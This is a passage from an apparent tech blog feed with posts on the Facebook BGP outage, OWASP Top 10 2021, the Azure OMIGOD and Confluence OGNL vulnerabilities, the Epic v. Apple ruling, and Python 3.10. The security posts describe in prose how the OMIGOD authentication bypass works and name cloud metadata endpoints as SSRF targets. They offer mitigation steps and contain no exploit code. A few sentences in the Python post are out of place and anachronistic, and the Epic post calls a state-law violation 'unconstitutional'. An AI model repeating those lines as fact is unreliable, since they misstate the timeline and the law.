down and we can\u0026rsquo;t access anything remotely\u0026rdquo; runbooks. Including physical access procedures. DNS diversity. If you run your own authoritative DNS, ensure it\u0026rsquo;s not entirely dependent on a single network path. The WhatsApp Effect # Something that\u0026rsquo;s gotten less technical attention but matters enormously: WhatsApp went down too. In many parts of the world — Latin America, India, much of Africa and Southeast Asia — WhatsApp isn\u0026rsquo;t just a messaging app. It\u0026rsquo;s critical communications infrastructure. Small businesses run on it. Healthcare communications depend on it. Government services use it.\nA six-hour outage of WhatsApp has real-world consequences that go far beyond \u0026ldquo;I can\u0026rsquo;t post my lunch photos.\u0026rdquo; This raises uncomfortable questions about the concentration of critical communications on a single company\u0026rsquo;s infrastructure. When three billion people depend on one company\u0026rsquo;s network configuration not having typos, we have a resilience problem that technology alone can\u0026rsquo;t solve.\nMy Take # I\u0026rsquo;ve been doing infrastructure work for decades, and every major outage teaches the same lesson in a slightly different way: complexity is the enemy of reliability. Facebook\u0026rsquo;s network is among the most sophisticated on the planet, managed by some of the best network engineers in the industry. And yet, a single configuration change brought it all down.\nThe fix isn\u0026rsquo;t more complexity. It\u0026rsquo;s not more automation (the automation was part of the problem — the configuration change passed automated checks). It\u0026rsquo;s about designing systems where failures are contained, where recovery paths don\u0026rsquo;t depend on the thing that\u0026rsquo;s broken, and where human judgment remains in the loop for changes that could affect global reachability.\nFor those of us running smaller-scale infrastructure, the lessons are directly applicable. Audit your blast radius. Make sure your monitoring works when your primary systems don\u0026rsquo;t. Test your recovery procedures under realistic failure conditions — not just \u0026ldquo;one node down\u0026rdquo; but \u0026ldquo;everything is down and you can only access the console.\u0026rdquo;\nAnd maybe, just maybe, keep a telephone number for your key team members written down somewhere that isn\u0026rsquo;t in a cloud-hosted contact list.\nPart of an ongoing series on infrastructure design and operational resilience. Previous entries have covered CDN outages, cloud vulnerabilities, and the challenge of building reliable distributed systems.\n","date":"30 September 2021","externalUrl":null,"permalink":"/posts/210930-facebook-bgp-outage-internet-fragility/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Facebook, WhatsApp, and Instagram went down for six hours due to a BGP misconfiguration, exposing how fragile the internet’s routing infrastructure really is.","title":"The Facebook Outage — When BGP Goes Wrong, Everything Goes Dark","type":"posts"},{"content":"The OWASP Foundation has just published the 2021 edition of the Top 10, and if you\u0026rsquo;ve been paying attention to the security incidents of the past few years, the reshuffling won\u0026rsquo;t surprise you. But if you\u0026rsquo;ve been coasting on the 2017 list as your security checklist — and let\u0026rsquo;s be honest, many teams have — it\u0026rsquo;s time for a serious reassessment.\nI\u0026rsquo;ve been building web applications since before SQL injection had a catchy name, and every time OWASP updates this list, it forces a useful conversation about where we\u0026rsquo;re actually failing as an industry.\nThe Big Movers # The most notable change is that Broken Access Control has jumped from fifth place all the way to number one. This shouldn\u0026rsquo;t shock anyone who\u0026rsquo;s done a penetration test in the last two years. We\u0026rsquo;ve gotten reasonably good at parameterized queries and output encoding, but authorization logic? That\u0026rsquo;s still a mess in most codebases I review.\nThe problem is structural. Authentication is a solved problem — you pick an identity provider, implement OAuth 2.0 or OIDC, and you\u0026rsquo;re done. But authorization is deeply tied to business logic. There\u0026rsquo;s no generic middleware that can tell you whether user A should be able to edit resource B in context C. Every application reinvents this wheel, and most do it poorly.\nCryptographic Failures (formerly \u0026ldquo;Sensitive Data Exposure\u0026rdquo;) moved up to second place. The rename is telling — OWASP is shifting from describing symptoms to describing root causes. It\u0026rsquo;s not just about data being exposed; it\u0026rsquo;s about the cryptographic decisions (or non-decisions) that led there. I still encounter applications using MD5 for password hashing or storing API keys in plaintext config files. In 2021.\nInjection dropping to third might seem surprising given its decade-long reign at number one, but it reflects genuine progress. ORMs, parameterized queries, and frameworks that escape output by default have made classic injection harder to introduce accidentally. We haven\u0026rsquo;t eliminated it — we\u0026rsquo;ve just raised the floor.\nThree New Categories Worth Your Attention # The 2021 list introduces three entirely new categories, and each one tells a story about how software development has changed.\nInsecure Design (A04) is perhaps the most important addition. This isn\u0026rsquo;t about implementation bugs — it\u0026rsquo;s about architectural flaws that no amount of perfect coding can fix. Think of an e-commerce site that lets you enumerate valid discount codes by checking the response time, or an API that returns different error messages for \u0026ldquo;user not found\u0026rdquo; vs \u0026ldquo;wrong password.\u0026rdquo; These are design-level decisions that create vulnerabilities before a single line of code is written.\nI\u0026rsquo;ve been advocating for threat modeling in the design phase for years, and it\u0026rsquo;s gratifying to see OWASP formally recognize that security isn\u0026rsquo;t just a code review activity. If your team doesn\u0026rsquo;t do threat modeling during architecture reviews, this should be your wake-up call.\nSoftware and Data Integrity Failures (A08) covers the increasingly critical area of supply chain security. After SolarWinds, Codecov, and the steady drumbeat of npm package compromises, this category feels overdue. It encompasses everything from unsigned updates to CI/CD pipeline integrity to deserializing untrusted data. The common thread: are you verifying the integrity of the software and data flowing through your systems?\nServer-Side Request Forgery (A10) rounds out the new entries. SSRF has been a darling of bug bounty programs for years, particularly as cloud metadata endpoints (like AWS\u0026rsquo;s 169.254.169.254) became lucrative targets. With everything moving to microservices architectures where services routinely make HTTP requests to internal endpoints, SSRF is a natural fit for the list.\nWhat This Means for Your Development Process # If you\u0026rsquo;re treating OWASP Top 10 as a checklist — which, to be clear, OWASP explicitly says you shouldn\u0026rsquo;t — then at minimum you need to update your security training and code review guidelines. But I\u0026rsquo;d encourage teams to go further.\nThe shift toward design-level and supply chain concerns means security needs to move earlier in your development lifecycle. Here\u0026rsquo;s what I\u0026rsquo;d prioritize:\nThreat modeling workshops during design sprints. You don\u0026rsquo;t need a formal methodology — even a 30-minute \u0026ldquo;what could go wrong\u0026rdquo; session with your team will catch design-level issues.\nDependency auditing as a first-class CI/CD concern. Run npm audit, pip-audit, or your language\u0026rsquo;s equivalent on every build. Pin your dependencies. Verify checksums.\nAuthorization testing as part of your integration test suite. For every API endpoint, test that users can only access what they should. Automate it — manual testing doesn\u0026rsquo;t scale.\nSSRF protections at the infrastructure level. Restrict outbound requests from your application servers. Use allowlists for internal service communication. Block access to cloud metadata endpoints unless explicitly needed.\nMy Take # What I appreciate most about the 2021 update is its maturity. The list has evolved from \u0026ldquo;here are the bugs you\u0026rsquo;re writing\u0026rdquo; to \u0026ldquo;here are the systemic failures in how you build software.\u0026rdquo; Broken access control, insecure design, and integrity failures aren\u0026rsquo;t problems you solve with a WAF rule or a static analysis tool. They require engineering discipline, architectural thinking, and organizational commitment.\nThe cynical view is that we keep publishing lists like this because nothing actually improves. But I\u0026rsquo;ve watched injection drop from perennial champion to third place over a decade. Progress is possible — it\u0026rsquo;s just slow and requires the right tooling and education.\nIf you haven\u0026rsquo;t already, carve out an afternoon with your team to review the new list against your current applications. You might be surprised what you find — or more accurately, what\u0026rsquo;s been hiding in plain sight.\nThis is part of an ongoing series examining security practices in real-world development. The OWASP Top 10 remains one of the most influential documents in application security, and this update deserves your attention.\n","date":"23 September 2021","externalUrl":null,"permalink":"/posts/210923-owasp-top-10-2021-update/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The OWASP Top 10 gets its first update since 2017, and the changes reflect how fundamentally our attack surface has evolved.","title":"OWASP Top 10 2021 — The Security Landscape Has Shifted","type":"posts"},{"content":"This week\u0026rsquo;s Patch Tuesday brought something genuinely alarming from the Azure world. Researchers at Wiz disclosed OMIGOD — a set of four critical vulnerabilities in the Open Management Infrastructure (OMI) agent, a piece of software that Microsoft silently installs on Linux VMs in Azure when you enable certain services. The worst of these, CVE-2021-38647, allows unauthenticated remote code execution as root. Yes, root. With a CVSS score of 9.8.\nAnd here\u0026rsquo;s the part that makes my blood pressure spike: most Azure customers running Linux VMs had no idea this software was installed on their machines.\nWhat Is OMI, and Why Is It on My VM? # OMI (Open Management Infrastructure) is an open-source project maintained by Microsoft. It\u0026rsquo;s a CIM (Common Information Model) management agent — essentially, a lightweight daemon that enables remote management and monitoring of Linux systems. Think of it as the Linux equivalent of WMI (Windows Management Instrumentation).\nWhen you enable certain Azure services on a Linux VM — including Azure Automation, Azure Log Analytics, Azure Configuration Management, Azure Diagnostics, and others — Azure automatically deploys the OMI agent onto your VM. It runs as root, listens on port 5986 (HTTPS) or 5985 (HTTP), and accepts management commands via the WSMAN protocol.\nThe critical vulnerability is breathtakingly simple. When OMI receives a management request, it checks for an authentication header. If the authentication header is entirely absent — not invalid, but simply missing — the request is processed as root. Remove the auth header, get root access. It\u0026rsquo;s the kind of vulnerability that makes you wonder how it survived any security review at all.\nThe Scope of the Problem # According to Wiz\u0026rsquo;s research, OMI is deployed on more than 65% of Azure Linux VMs. That\u0026rsquo;s potentially millions of machines. And because the agent listens on network ports, any Linux VM with OMI installed and the management ports exposed — either to the internet or to other VMs in the virtual network — is vulnerable.\nThe attack surface breaks down into two scenarios:\nInternet-facing: If ports 5985/5986 are open to the internet (which they shouldn\u0026rsquo;t be, but misconfigurations happen), an attacker can gain root access from anywhere on the internet. Shodan queries are already showing thousands of exposed instances.\nInternal network: Even if the management ports aren\u0026rsquo;t internet-facing, any attacker with access to your Azure virtual network can pivot through OMI to gain root on adjacent VMs. This makes OMIGOD an excellent privilege escalation and lateral movement tool for attackers who already have a foothold.\nThe Trust Problem # What troubles me most about OMIGOD isn\u0026rsquo;t the vulnerability itself — software has bugs, and even embarrassing authentication bypasses happen. What troubles me is the trust model.\nWhen I deploy a Linux VM in Azure, I expect to control what\u0026rsquo;s running on it. I choose the OS image, I install my packages, I configure my services. That\u0026rsquo;s the fundamental promise of IaaS: you get a virtual machine, and you control the software stack.\nBut Azure silently installs management agents without explicit consent. The OMI deployment happens as a side effect of enabling other services. There\u0026rsquo;s no dialog box saying \u0026ldquo;This will install a root-level management daemon on your VM that listens on network ports.\u0026rdquo; You enable Log Analytics, and OMI appears.\nThis pattern isn\u0026rsquo;t unique to Azure. AWS has the SSM Agent. GCP has the guest agent. All cloud providers install management software on VMs. But the OMIGOD disclosure highlights the risk: you\u0026rsquo;re running software you didn\u0026rsquo;t choose, didn\u0026rsquo;t audit, and might not even know about, and it can have critical vulnerabilities.\nThe Patching Gap # Here\u0026rsquo;s where it gets worse. Microsoft released patches for the OMI vulnerabilities as part of Patch Tuesday on September 14. But — and this is critical — simply running Windows Update or applying Azure platform patches does NOT update the OMI agent on your Linux VMs.\nFor most affected Azure services, Microsoft needs to push an updated agent version, and this process is\u0026hellip; not instantaneous. Some services auto-update OMI, but others require manual intervention. The Wiz team documented the patching matrix, and it\u0026rsquo;s confusing — different Azure services have different update mechanisms for OMI.\nSo we have a situation where:\nMicrosoft silently installed vulnerable software on customer VMs Microsoft patched the vulnerability in OMI Microsoft cannot automatically patch many of the affected VMs Customers who didn\u0026rsquo;t know OMI was installed don\u0026rsquo;t know they need to patch it This is a patching nightmare.\nImmediate Actions # If you\u0026rsquo;re running Linux VMs on Azure, here\u0026rsquo;s what to do right now:\nCheck for OMI: SSH into your VMs and check:\ndpkg -l omi # Debian/Ubuntu rpm -qa omi # RHEL/CentOS If OMI is installed, check the version. Anything below 1.6.8-1 is vulnerable.\nBlock the ports: Ensure ports 5985 and 5986 are not accessible from the internet. Check your Network Security Groups (NSGs) immediately. Even for internal traffic, restrict access to these ports to only the management subnets that need them.\nUpdate manually if needed:\nwget https://github.com/microsoft/omi/releases/download/v1.6.8-1/omi-1.6.8-1.ssl_110.ulinux.x64.deb sudo dpkg -i ./omi-1.6.8-1.ssl_110.ulinux.x64.deb Check for compromise: Review OMI logs, look for unexpected processes running as root, check for newly created user accounts or SSH keys. If ports 5985/5986 were exposed to the internet, assume breach until you can prove otherwise.\nAudit your Azure service dependencies: Understand which Azure services you\u0026rsquo;ve enabled that might have triggered OMI installation. Consider whether you actually need those services.\nMy Take # I\u0026rsquo;ve been working with cloud infrastructure since the early AWS days, and the implicit trust we place in cloud providers has always made me uncomfortable. We assume that the platform layer is secure, that management agents are benign, and that automatic deployments are in our interest. Most of the time, that trust is warranted. But when it fails, it fails catastrophically.\nOMIGOD is a wake-up call for cloud security posture management. You cannot treat IaaS VMs as if you fully control the software stack. You need to:\nKnow your actual attack surface, including provider-installed agents Enforce network segmentation by default — management ports should never be broadly accessible Monitor for unexpected listening services as part of your security baseline Have an incident response plan that accounts for provider-side vulnerabilities The cloud shared responsibility model says the provider secures the platform and you secure your workload. But when the provider installs software in your workload without your knowledge, the responsibility boundary gets blurry. That ambiguity needs to be resolved — with better transparency from cloud providers about what they\u0026rsquo;re deploying, and better tooling for customers to audit their actual VM contents.\nIn the meantime, go check your Azure Linux VMs. Today.\n","date":"16 September 2021","externalUrl":null,"permalink":"/posts/210916-azure-omigod-vulnerability-cloud-agents/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The OMIGOD vulnerabilities in Azure’s silently-installed OMI agent expose a troubling pattern: cloud providers deploying software on your VMs without your knowledge or consent.","title":"OMIGOD — When Your Cloud Provider Installs Vulnerable Agents Without Telling You","type":"posts"},{"content":"The verdict is in, and predictably, both sides are claiming victory. On Friday, Judge Yvonne Gonzalez Rogers issued her ruling in Epic Games v. Apple, and the 185-page decision is far more nuanced than the \u0026ldquo;Apple wins\u0026rdquo; or \u0026ldquo;Epic wins\u0026rdquo; headlines would have you believe. As a developer who\u0026rsquo;s shipped apps through the App Store and dealt with Apple\u0026rsquo;s policies firsthand, I want to cut through the noise and focus on what actually matters for those of us building software.\nThe Ruling in Brief # Here\u0026rsquo;s the TL;DR: Apple won on nine of ten counts. The court found that Apple does not have a monopoly under federal antitrust law. Epic\u0026rsquo;s claims under the Sherman Act were rejected. The court defined the relevant market as \u0026ldquo;digital mobile gaming transactions\u0026rdquo; rather than \u0026ldquo;iOS app distribution\u0026rdquo; — a critical distinction that worked in Apple\u0026rsquo;s favor.\nHowever — and this is the part that matters — Apple lost on one significant count under California\u0026rsquo;s Unfair Competition Law (UCL). The court issued a permanent injunction ordering Apple to allow developers to include links and buttons in their apps directing users to external payment mechanisms. Apple has 90 days to comply.\nIn plain terms: developers can now tell users \u0026ldquo;hey, you can also buy this on our website\u0026rdquo; and link them there. What developers cannot do is process payments directly inside the app without going through Apple\u0026rsquo;s in-app purchase system.\nWhat Changes (And What Doesn\u0026rsquo;t) # Let\u0026rsquo;s be precise about what the injunction does and doesn\u0026rsquo;t change.\nWhat changes: The anti-steering provision — Apple\u0026rsquo;s rule that prevented developers from even mentioning alternative payment methods — is struck down. This is actually significant. Previously, if your app had a subscription that cost $9.99/month on the App Store, you couldn\u0026rsquo;t tell users they could subscribe for $7.99/month on your website. You couldn\u0026rsquo;t even acknowledge that your website existed as a purchase channel. That restriction is now unconstitutional under California law.\nWhat doesn\u0026rsquo;t change: Apple can still require in-app purchases for digital goods bought within the app. Apple can still charge its 15-30% commission on those in-app purchases. Apple still controls what goes in the App Store and on what terms. The 30% \u0026ldquo;Apple tax\u0026rdquo; is not going away.\nWhat\u0026rsquo;s unclear: How Apple will implement this. The devil is in the details. Will Apple allow a simple \u0026ldquo;Subscribe on our website\u0026rdquo; button? Or will they require dense legal disclaimers that make the experience terrible for users? History suggests Apple will comply with the letter of the law while violating its spirit.\nThe Developer Economics # Let\u0026rsquo;s talk about what this means practically. Say you\u0026rsquo;re an indie developer with a SaaS product that has a mobile component. You charge $10/month. Under the current regime:\nIn-app purchase: User pays $10, you receive $7 (after Apple\u0026rsquo;s 30% cut, or $8.50 if you qualify for the Small Business Program\u0026rsquo;s 15% rate) Website purchase: User pays $10, you receive approximately $9.70 (after payment processor fees) With the injunction, you can now include a link in your app saying \u0026ldquo;Subscribe at example.com for $10/month.\u0026rdquo; A savvy developer might even offer a small discount for web subscriptions: \u0026ldquo;Subscribe at example.com for $8/month\u0026rdquo; — still earning more per subscriber while passing savings to the user.\nThe question is: will users actually follow these links? The friction of leaving the app, opening a browser, entering payment details\u0026hellip; it\u0026rsquo;s real. Apple\u0026rsquo;s in-app purchase is convenient by design. My guess is that for casual purchases, most users will stay in-app. But for subscriptions and high-value transactions, a meaningful percentage will follow the external link, especially if there\u0026rsquo;s a price incentive.\nFor large developers like Spotify, Netflix, and the gaming companies — who already route users to the web for subscriptions — this is a formal blessing of what they\u0026rsquo;ve been doing informally through workarounds. For smaller developers, it opens a new channel that was previously forbidden.\nThe Broader Platform Question # What I find most interesting about the ruling is what it reveals about the court\u0026rsquo;s view of platform economics. Judge Gonzalez Rogers explicitly acknowledged that Apple earns \u0026ldquo;supracompetitive profits\u0026rdquo; from the App Store — profit margins well above what you\u0026rsquo;d expect in a competitive market. She called Apple\u0026rsquo;s 30% commission \u0026ldquo;extraordinarily high.\u0026rdquo;\nBut she stopped short of calling it monopolistic, because the court\u0026rsquo;s market definition included Android. Since users can (in theory) switch to Android, Apple doesn\u0026rsquo;t have monopoly power in the court\u0026rsquo;s view.\nThis is where the ruling feels disconnected from developer reality. Yes, users can switch platforms. But developers can\u0026rsquo;t simply ignore iOS. If you\u0026rsquo;re building a consumer mobile app, you need to be on both platforms. Apple\u0026rsquo;s market share in the US is roughly 55-60%, and its users tend to spend more on apps. Walking away from iOS isn\u0026rsquo;t a realistic option for most developers.\nThe ruling essentially says: Apple\u0026rsquo;s commission is high and arguably unfair, but it\u0026rsquo;s not illegal because competition exists. That\u0026rsquo;s a legally sound conclusion, but it leaves developers in a market with two platforms that both charge similar commissions and have similar restrictions. \u0026ldquo;Competition\u0026rdquo; that produces identical pricing isn\u0026rsquo;t exactly what Adam Smith had in mind.\nWhat Happens Next # Both sides are expected to appeal. Epic has already announced its intention to do so, and Apple will likely appeal the UCL finding. This will end up at the Ninth Circuit, and potentially the Supreme Court.\nIn the meantime, the 90-day clock on the injunction is ticking. Developers should start planning for how to implement external payment links in their iOS apps. Some things to consider:\nDesign the user experience now. How will you present the external payment option? Make it clear, not buried. Set up web payment flows if you don\u0026rsquo;t already have them. Stripe, Paddle, or your payment processor of choice. Price strategy: Will you offer a discount for web purchases? The math probably makes sense for subscriptions. Watch Apple\u0026rsquo;s implementation guidelines closely. They will define exactly what\u0026rsquo;s allowed, and the constraints will matter. My Take # This ruling is a step forward, but a modest one. The anti-steering provision was the most developer-hostile aspect of Apple\u0026rsquo;s policies, and striking it down is genuinely positive. But the core economics of the App Store haven\u0026rsquo;t changed. The 30% commission stands. Apple\u0026rsquo;s control over distribution stands. Sideloading remains prohibited on iOS.\nI\u0026rsquo;ve been building software long enough to remember when platform owners didn\u0026rsquo;t extract 30% of every transaction. The web remains the most open platform we have — no gatekeepers, no commissions, no approval process. Every time I deal with App Store policies, I appreciate the web a little more.\nThe real pressure on Apple isn\u0026rsquo;t coming from this ruling. It\u0026rsquo;s coming from regulatory action in the EU (the Digital Markets Act), South Korea\u0026rsquo;s new law requiring alternative payment systems, and the general political momentum toward platform regulation. This court case is one front in a much larger battle.\nFor now, get ready to add that \u0026ldquo;Subscribe on our website\u0026rdquo; button. It\u0026rsquo;s not revolution, but it\u0026rsquo;s progress.\n","date":"9 September 2021","externalUrl":null,"permalink":"/posts/210909-apple-epic-ruling-developer-impact/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The landmark Apple vs. Epic Games ruling is more nuanced than the headlines suggest — here’s what the injunction actually changes for app developers.","title":"Apple vs. Epic Games Ruling — What It Actually Means for Developers","type":"posts"},{"content":"If you\u0026rsquo;re running a self-hosted Atlassian Confluence server, stop reading and go patch it. Right now. CVE-2021-26084 is a critical OGNL injection vulnerability that allows unauthenticated remote code execution, and it\u0026rsquo;s being actively exploited in the wild at scale. Mass scanning for vulnerable instances began within days of the advisory, and we\u0026rsquo;re now seeing reports of cryptominers, webshells, and worse being deployed on compromised servers.\nThis is as bad as it sounds.\nThe Vulnerability # The flaw exists in Confluence Server and Data Center versions prior to 6.13.23, 7.4.11, 7.11.6, 7.12.5, and 7.13.0. It\u0026rsquo;s an OGNL (Object-Graph Navigation Language) injection in the Confluence widget connector, specifically in how user input gets processed in Velocity templates.\nOGNL injection in Java applications is a well-known attack class — it was behind the catastrophic Apache Struts breach at Equifax in 2017. The pattern is depressingly familiar: user input gets passed into an expression language evaluator without proper sanitization, allowing attackers to execute arbitrary Java code on the server.\nThe proof-of-concept exploits circulating are trivially simple. A single crafted HTTP request to a specific endpoint can achieve code execution. No authentication required. No complex exploit chain. Just a POST request and you own the server.\nAtlassian released patches on August 25, and CISA issued an alert urging immediate patching. But as we\u0026rsquo;ve seen time and again, the patch-to-exploit window has collapsed to days, and many organizations simply cannot patch that fast.\nThe Self-Hosted Dilemma # This vulnerability crystallizes a problem I\u0026rsquo;ve been thinking about for years: the sustainability of self-hosted enterprise software.\nConfluence Server is deployed in thousands of organizations — from small startups to Fortune 500 companies. Each instance is independently managed, independently patched, and independently secured. When a critical vulnerability drops, the security of the entire ecosystem depends on thousands of individual administrators reading the advisory, testing the patch, scheduling maintenance windows, and deploying the fix.\nCompare this to Confluence Cloud, where Atlassian patches once and every customer is protected simultaneously. The cloud instance was not affected by CVE-2021-26084.\nI\u0026rsquo;m not suggesting that cloud is inherently more secure — it has its own risk profile, and a vulnerability in the cloud version would affect everyone at once. But the patching problem is fundamentally different. Self-hosted software distributes the patching burden to the least-resourced party: the customer.\nThis pattern repeats across the enterprise software landscape. Exchange Server (ProxyLogon, ProxyShell), SolarWinds, and now Confluence. The organizations running these servers often lack dedicated security teams, have complex change management processes, and run versions several releases behind current.\nThe Operational Reality # Let me paint the picture from the operations side, because I\u0026rsquo;ve lived this scenario more times than I\u0026rsquo;d like to admit.\nYou\u0026rsquo;re running Confluence Server. Maybe it was deployed five years ago by a team that\u0026rsquo;s since moved on. It\u0026rsquo;s on a VM somewhere — maybe in your datacenter, maybe on an EC2 instance that someone provisioned and forgot about. It\u0026rsquo;s running an older version because upgrading Confluence is a non-trivial operation that requires downtime, database migrations, and plugin compatibility testing.\nWhen the CVE drops, several things need to happen:\nSomeone needs to notice the advisory That person needs authority to schedule emergency maintenance The team needs to test the patch against their specific configuration and plugins They need a maintenance window (even if \u0026ldquo;emergency,\u0026rdquo; there\u0026rsquo;s often process) They need to actually perform the upgrade without breaking things They need to verify the patch was applied correctly In organizations with mature security operations, this might happen in 24-48 hours. In many organizations? Weeks. Months. Some will never patch at all — the instances will sit there, vulnerable, until they\u0026rsquo;re compromised or decommissioned.\nMeanwhile, the exploit code is public, scanning is automated, and attackers are moving faster than defenders.\nPractical Mitigations # If you can\u0026rsquo;t patch immediately, Atlassian has provided a mitigation script that modifies the affected files in place. It\u0026rsquo;s a temporary measure, not a substitute for patching, but it can buy you time.\nBeyond that:\nNetwork segmentation: Your Confluence server should not be directly accessible from the internet. Put it behind a VPN or reverse proxy with authentication. This single control would have prevented most of the mass exploitation we\u0026rsquo;re seeing.\nWAF rules: If you\u0026rsquo;re running a web application firewall, deploy rules to block OGNL injection patterns. It\u0026rsquo;s not bulletproof, but it adds a layer.\nMonitor for indicators of compromise: Check for unusual processes running as the Confluence user, unexpected outbound network connections, new cron jobs, or modified files in the Confluence installation directory. If you\u0026rsquo;ve been running an unpatched instance exposed to the internet, assume compromise until proven otherwise.\nAsset inventory: If you don\u0026rsquo;t know whether you\u0026rsquo;re running Confluence Server somewhere in your environment, that\u0026rsquo;s the bigger problem. Shadow IT instances are breach vectors.\nMy Take # Every major self-hosted software vulnerability reinforces my conviction that the industry is moving toward managed services for good reasons. Not because SaaS is perfect — it\u0026rsquo;s not — but because the patching economics of self-hosted software are broken.\nWhen I started my career, running your own servers was the default. You bought software, installed it on your hardware, and managed the whole stack. That model made sense when the threat landscape was less hostile and when \u0026ldquo;the internet\u0026rdquo; wasn\u0026rsquo;t something every server was expected to be connected to.\nToday, every internet-facing application is under constant automated scanning. The time between vulnerability disclosure and active exploitation is measured in hours, not months. The self-hosted model places an unrealistic patching burden on organizations that, frankly, have other priorities.\nThis doesn\u0026rsquo;t mean self-hosted is always wrong — there are legitimate compliance, data sovereignty, and customization reasons to run your own infrastructure. But if you choose that path, you\u0026rsquo;re accepting the responsibility to patch at the speed of attackers, not at the speed of your change management process.\nIf you\u0026rsquo;re running Confluence Server today, patch it. Then start the conversation about whether self-hosting is the right choice for your organization going forward. Atlassian is clearly pushing toward cloud — and incidents like this explain why.\n","date":"2 September 2021","externalUrl":null,"permalink":"/posts/210902-confluence-rce-cve-2021-26084/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The critical Confluence Server RCE vulnerability is being actively exploited in the wild, raising urgent questions about the sustainability of self-hosted enterprise software.","title":"Confluence Under Siege — CVE-2021-26084 and the Self-Hosted Software Problem","type":"posts"},{"content":"Python 3.10 RC1 dropped this week, and while there are plenty of incremental improvements — better error messages, parenthesized context managers, stricter zip behavior — the headline feature is structural pattern matching via the new match/case statements (PEP 634, 635, 636). This is the most substantial syntax addition to Python since async/await in Python 3.5, and it\u0026rsquo;s generating exactly the kind of heated debate you\u0026rsquo;d expect from the Python community.\nMore Than a Switch Statement # Let me address the most common misconception right away: this is not just a switch/case statement. If you\u0026rsquo;re coming from C, Java, or JavaScript and thinking \u0026ldquo;finally, Python gets switch,\u0026rdquo; you\u0026rsquo;re missing the point entirely.\nStructural pattern matching lets you match against the structure of data, destructuring it in the process. Later Python releases continued to evolve the language. Here\u0026rsquo;s a simple example:\nmatch command: case {\u0026#34;action\u0026#34;: \u0026#34;move\u0026#34;, \u0026#34;direction\u0026#34;: str(dir), \u0026#34;distance\u0026#34;: int(dist)}: move(dir, dist) case {\u0026#34;action\u0026#34;: \u0026#34;rotate\u0026#34;, \u0026#34;angle\u0026#34;: float(angle)}: rotate(angle) case _: print(\u0026#34;Unknown command\u0026#34;) You\u0026rsquo;re matching against dictionary structure, extracting values, and validating types — all in a single, readable expression. Try doing that with a chain of if/elif statements. You can, of course, but the pattern matching version communicates intent far more clearly.\nWhere it gets truly powerful is with class patterns:\nmatch event: case Click(position=(x, y)) if x \u0026gt; 100: handle_right_click(x, y) case KeyPress(key_name=\u0026#34;q\u0026#34;) | KeyPress(key_name=\u0026#34;Q\u0026#34;): quit() case Drag(start=s, end=e) if distance(s, e) \u0026gt; 10: handle_drag(s, e) This is pattern matching in the ML/functional programming tradition — think Haskell, Rust, Scala, or Elixir. Python is joining a well-established lineage, and it\u0026rsquo;s doing so in a characteristically Pythonic way. The Python 3.14 evolution would continue adding powerful capabilities.\nThe Community Debate # Python language design discussions continued to be vibrant in the community.\nThe Python community has been anything but unified on this feature. The PEP went through extensive discussion, multiple revisions, and a Steering Council vote. Critics raise several concerns:\nComplexity: Python has long prided itself on having \u0026ldquo;one obvious way to do it.\u0026rdquo; Pattern matching introduces a second, very different way to handle conditional logic. Will new Python developers struggle with when to use match versus if/elif?\nSoft keywords: match and case are \u0026ldquo;soft keywords\u0026rdquo; — they\u0026rsquo;re only special in the context of a match statement. You can still have variables named match and case. This is a pragmatic choice to avoid breaking existing code, but it adds cognitive overhead and complicates tooling.\nOveruse potential: There\u0026rsquo;s a legitimate concern that developers will reach for pattern matching when a simple if statement would suffice. Just because you can match against a pattern doesn\u0026rsquo;t mean you should.\nI\u0026rsquo;ve seen this debate play out before with every major language feature. List comprehensions were controversial. Decorators were controversial. F-strings were controversial. All of them are now beloved, idiomatic Python. I suspect pattern matching will follow the same trajectory, though it\u0026rsquo;ll take longer because the feature is more complex.\nWhere It Shines # Having experimented with the beta releases, I\u0026rsquo;ve found pattern matching most valuable in specific scenarios:\nProtocol/message handling: If you\u0026rsquo;re processing structured messages — JSON-RPC, GraphQL responses, event payloads — pattern matching is a natural fit. The ability to destructure and validate in one expression eliminates a lot of boilerplate.\nAST/tree processing: If you\u0026rsquo;re writing compilers, linters, code analyzers, or any tool that walks tree structures, pattern matching dramatically simplifies the code. This was one of the primary motivations cited in the PEP.\nState machines: Matching against state/event combinations becomes cleaner and more maintainable. The guard clauses (the if conditions in case statements) are particularly useful here.\nCommand dispatching: CLI tools, chatbots, API routers — anything that needs to parse and dispatch structured commands benefits from the expressiveness of pattern matching.\nWhere I\u0026rsquo;d avoid it: simple value comparisons. If you\u0026rsquo;re just checking if status == 200, don\u0026rsquo;t write a match statement. The if statement is simpler, more familiar, and equally readable.\nBetter Error Messages: The Unsung Hero # While pattern matching gets the headlines, I\u0026rsquo;m equally excited about the improved error messages in 3.10. The Python team has done significant work to make syntax errors more informative:\n# Python 3.9 SyntaxError: unexpected EOF while parsing # Python 3.10 SyntaxError: \u0026#39;{\u0026#39; was never closed Or for the classic missing colon:\n# Python 3.9 SyntaxError: invalid syntax # Python 3.10 SyntaxError: expected \u0026#39;:\u0026#39; As someone who\u0026rsquo;s mentored junior developers, I cannot overstate how much better error messages improve the learning experience. The number of times I\u0026rsquo;ve watched someone stare at \u0026ldquo;invalid syntax\u0026rdquo; trying to figure out what went wrong — these improvements will save thousands of hours of collective frustration.\nPreparing Your Codebase # If you\u0026rsquo;re running production Python, don\u0026rsquo;t rush to 3.10 on day one — wait for the first maintenance release (3.10.1, likely in December). But do start planning:\nRun your test suite against 3.10 RC1 in CI. Identify any breakage now while there\u0026rsquo;s still time to report issues. Review your type hints. Python 3.10 allows X | Y syntax for union types instead of Union[X, Y]. Combined with ParamSpec from 3.10, your type annotations can get significantly cleaner. Identify pattern matching candidates in your codebase. Look for long if/elif chains that check types or structure. These are natural migration targets. My Take # I\u0026rsquo;ve been writing Python since the 1.5 days, and I\u0026rsquo;ve watched the language evolve from a scripting tool into a serious engineering language. Structural pattern matching is a mature, well-designed feature that fills a real gap. It\u0026rsquo;s not going to replace conditional logic everywhere, nor should it. But for the domains where it fits — data processing, protocol handling, tree walking — it\u0026rsquo;s going to make Python code significantly more readable and maintainable.\nThe fact that it took three PEPs and extensive community debate to get right is actually reassuring. Python\u0026rsquo;s governance model works. The feature is better for the scrutiny it received.\nOctober\u0026rsquo;s final release can\u0026rsquo;t come soon enough.\n","date":"26 August 